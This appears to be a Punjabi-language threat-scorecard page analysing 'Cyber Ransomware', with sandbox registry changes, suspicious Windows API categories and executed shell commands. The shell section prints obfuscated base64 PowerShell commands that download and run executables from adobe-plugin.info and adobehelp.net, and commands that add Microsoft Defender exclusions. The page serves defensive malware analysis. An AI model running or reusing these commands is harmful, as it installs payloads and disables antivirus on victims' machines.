HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey

HKLM\software\microsoft\windows\currentversion\runonce::wextract_cleanup0	rundll32.exe C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Vebexpvr\AppData\Local\Temp\IXP000.TMP\"	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe	᭖洢Ǜ	RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	洧Ǜ	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::0	C:\Users\Vebexpvr\AppData\Local\Launcher.exeC:\Users\Vebexpvr\AppData\Local	RegNtPreCreateKey
HKCU\software\microsoft\windows\currentversion\explorer\comdlg32\firstfolder::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::1	Z1敖敢灸牶B 뻯.Vebexpvr	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::0	V1嫬齤灡摰瑡a@ 뻯啮坤嫬齤.穗붽æappdata	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::0	P1嫬齤潬慣l< 뻯嫬齤嫬齥.穘ˑQlocal	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::nodeslot		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru\2\1\0\1\0\0::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bags\132\shell::sniffedfoldertype	Generic	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::nodeslots	ȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂȂ	RegNtPreCreateKey
HKCU\local settings\software\microsoft\windows\shell\bagmru::mrulistex		RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	椓嵌Ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475		RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe	ﻒ⍮味ǜ	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc3475	㴠ȁ龡^8獖}	RegNtPreCreateKey
HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75		RegNtPreCreateKey

Windows API Usage

Category	API
Process Manipulation Evasion	NtUnmapViewOfSection
Process Shell Execute	CreateProcess ShellExecute
Syscall Use	ntdll.dll!NtAccessCheck ntdll.dll!NtAccessCheckByType ntdll.dll!NtAddAtomEx ntdll.dll!NtAlertThreadByThreadId ntdll.dll!NtAllocateLocallyUniqueId ntdll.dll!NtAlpcAcceptConnectPort ntdll.dll!NtAlpcConnectPort ntdll.dll!NtAlpcConnectPortEx ntdll.dll!NtAlpcCreatePort ntdll.dll!NtAlpcCreatePortSection Show More ntdll.dll!NtAlpcCreateSectionView ntdll.dll!NtAlpcCreateSecurityContext ntdll.dll!NtAlpcQueryInformation ntdll.dll!NtAlpcSendWaitReceivePort ntdll.dll!NtAlpcSetInformation ntdll.dll!NtApphelpCacheControl ntdll.dll!NtAssociateWaitCompletionPacket ntdll.dll!NtCancelWaitCompletionPacket ntdll.dll!NtClearEvent ntdll.dll!NtClose ntdll.dll!NtCompareSigningLevels ntdll.dll!NtConnectPort ntdll.dll!NtCreateEvent ntdll.dll!NtCreateFile ntdll.dll!NtCreateIoCompletion ntdll.dll!NtCreateKey ntdll.dll!NtCreateMutant ntdll.dll!NtCreatePrivateNamespace ntdll.dll!NtCreateSection ntdll.dll!NtCreateSemaphore ntdll.dll!NtCreateThreadEx ntdll.dll!NtCreateTimer ntdll.dll!NtCreateTimer2 ntdll.dll!NtCreateWaitCompletionPacket ntdll.dll!NtCreateWorkerFactory ntdll.dll!NtDelayExecution ntdll.dll!NtDeleteValueKey ntdll.dll!NtDeviceIoControlFile ntdll.dll!NtDuplicateObject ntdll.dll!NtDuplicateToken ntdll.dll!NtEnumerateKey ntdll.dll!NtEnumerateValueKey ntdll.dll!NtFindAtom ntdll.dll!NtFlushProcessWriteBuffers ntdll.dll!NtFreeVirtualMemory ntdll.dll!NtFsControlFile ntdll.dll!NtGetCachedSigningLevel ntdll.dll!NtGetNlsSectionPtr ntdll.dll!NtImpersonateAnonymousToken ntdll.dll!NtMapViewOfSection ntdll.dll!NtNotifyChangeKey ntdll.dll!NtOpenDirectoryObject ntdll.dll!NtOpenEvent ntdll.dll!NtOpenFile ntdll.dll!NtOpenKey ntdll.dll!NtOpenKeyEx ntdll.dll!NtOpenMutant ntdll.dll!NtOpenProcess ntdll.dll!NtOpenProcessToken ntdll.dll!NtOpenProcessTokenEx ntdll.dll!NtOpenSection ntdll.dll!NtOpenSemaphore ntdll.dll!NtOpenSymbolicLinkObject ntdll.dll!NtOpenThread ntdll.dll!NtOpenThreadToken ntdll.dll!NtOpenThreadTokenEx ntdll.dll!NtProtectVirtualMemory ntdll.dll!NtQueryAttributesFile ntdll.dll!NtQueryDefaultLocale ntdll.dll!NtQueryDirectoryFile ntdll.dll!NtQueryDirectoryFileEx ntdll.dll!NtQueryEvent ntdll.dll!NtQueryFullAttributesFile ntdll.dll!NtQueryInformationFile ntdll.dll!NtQueryInformationJobObject ntdll.dll!NtQueryInformationProcess ntdll.dll!NtQueryInformationThread ntdll.dll!NtQueryInformationToken ntdll.dll!NtQueryKey ntdll.dll!NtQueryLicenseValue ntdll.dll!NtQueryObject ntdll.dll!NtQueryPerformanceCounter ntdll.dll!NtQuerySecurityAttributesToken ntdll.dll!NtQuerySecurityObject ntdll.dll!NtQuerySymbolicLinkObject ntdll.dll!NtQuerySystemInformation ntdll.dll!NtQuerySystemInformationEx ntdll.dll!NtQueryValueKey ntdll.dll!NtQueryVirtualMemory ntdll.dll!NtQueryVolumeInformationFile ntdll.dll!NtQueryWnfStateData ntdll.dll!NtReadFile ntdll.dll!NtReadVirtualMemory ntdll.dll!NtReleaseMutant ntdll.dll!NtReleaseSemaphore ntdll.dll!NtReleaseWorkerFactoryWorker ntdll.dll!NtRequestWaitReplyPort ntdll.dll!NtResumeThread ntdll.dll!NtSetEvent ntdll.dll!NtSetInformationFile 206 additional items are not displayed above.
Anti Debug	IsDebuggerPresent NtQuerySystemInformation
User Data Access	GetUserDefaultLocaleName GetUserName GetUserNameEx GetUserObjectInformation
Encryption Used	BCryptOpenAlgorithmProvider
Other Suspicious	AdjustTokenPrivileges

Shell Command Execution


							open C:\Users\Vebexpvr\AppData\Local\Launcher.exe


							open C:\Users\Vebexpvr\deployment_test.EXE


							cmd.exe /c father.bat


							C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell  -Command "Start-Process -WindowStyle Hidden -FilePath powershell -Verb RunAs -ArgumentList '-NoProfile -Command Add-MpPreference -ExclusionPath \"C:\Users\Vebexpvr\*\"


							open powershell -EncodedCommand "PAAjAHYAYQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQAtAHAAbAB1AGcAaQBuAC4AaQBuAGYAbwAvAHkAYwAuAGUAeABlACcALAAgADwAIwBqAHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAZABzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAdAB4ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwAuAGUAeABlACcAKQApADwAIwBlAGEAdgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBhAGQAbwBiAGUALQBwAGwAdQBnAGkAbgAuAGkAbgBmAG8ALwB5AGMAdgAuAGUAeABlACcALAAgADwAIwBqAHEAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGIAcQB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGMAdABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHkAYwB2AC4AZQB4AGUAJwApACkAPAAjAGkAZgBpACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAZwBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAG0AZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMALgBlAHgAZQAnACkAPAAjAHYAcQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGwAdABiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwByAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB5AGMAdgAuAGUAeABlACcAKQA8ACMAegB2AHQAIwA+AA=="


									open powershell -EncodedCommand "PAAjAHQAegBsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGEAZABvAGIAZQBoAGUAbABwAC4AbgBlAHQALwB3AGkAbgA4ADYALgBlAHgAZQAnACwAIAA8ACMAegBhAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGwAZAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHMAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB3AGkAbgA4ADYALgBlAHgAZQAnACkAKQA8ACMAaAB6AHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGgAcgB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHcAaQBuADgANgAuAGUAeABlACcAKQA8ACMAbgB2AG0AIwA+AA=="


									open powershell -EncodedCommand "PAAjAGsAYwBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAcwBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAZABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAdABlACMAPgA="


									open C:\Users\Qoceadrm\AppData\Local\Temp\Album_TD_3-8-0_Activation.exe


									open C:\Users\Qoceadrm\AppData\Local\Temp\ttrj.exe

Cyber Ransomware

ਧਮਕੀ ਸਕੋਰ ਕਾਰਡ

EnigmaSoft ਧਮਕੀ ਸਕੋਰਕਾਰਡ

Cyber Ransomware ਐਨਕ੍ਰਿਪਸ਼ਨ ਦੁਆਰਾ ਬਹੁਤ ਸਾਰੀਆਂ ਫਾਈਲ ਕਿਸਮਾਂ ਨੂੰ ਪਹੁੰਚਯੋਗ ਨਹੀਂ ਬਣਾ ਸਕਦਾ ਹੈ

Cyber Ransomware ਵਰਗੇ ਖ਼ਤਰਿਆਂ ਤੋਂ ਆਪਣੇ ਡਿਵਾਈਸਾਂ ਅਤੇ ਡੇਟਾ ਨੂੰ ਸੁਰੱਖਿਅਤ ਕਰਨਾ ਯਕੀਨੀ ਬਣਾਓ

Cyber Ransomware ਵੀਡੀਓ

ਵਿਸ਼ਲੇਸ਼ਣ ਰਿਪੋਰਟ

ਆਮ ਜਾਣਕਾਰੀ

Known Samples

Known Samples

Windows Portable Executable Attributes

Windows Portable Executable Attributes

File Icons

File Icons

File Traits

Block Information

Block Information

Visual Map

Similar Families

Similar Families

Files Modified

Files Modified

Registry Modifications

Registry Modifications

Windows API Usage

Windows API Usage

Shell Command Execution

Shell Command Execution

ਟਿੱਪਣੀ ਦਰਜ ਕਰੋ

ਸੰਬੰਧਿਤ ਪੋਸਟ

ਪ੍ਰਚਲਿਤ

ਸਭ ਤੋਂ ਵੱਧ ਦੇਖੇ ਗਏ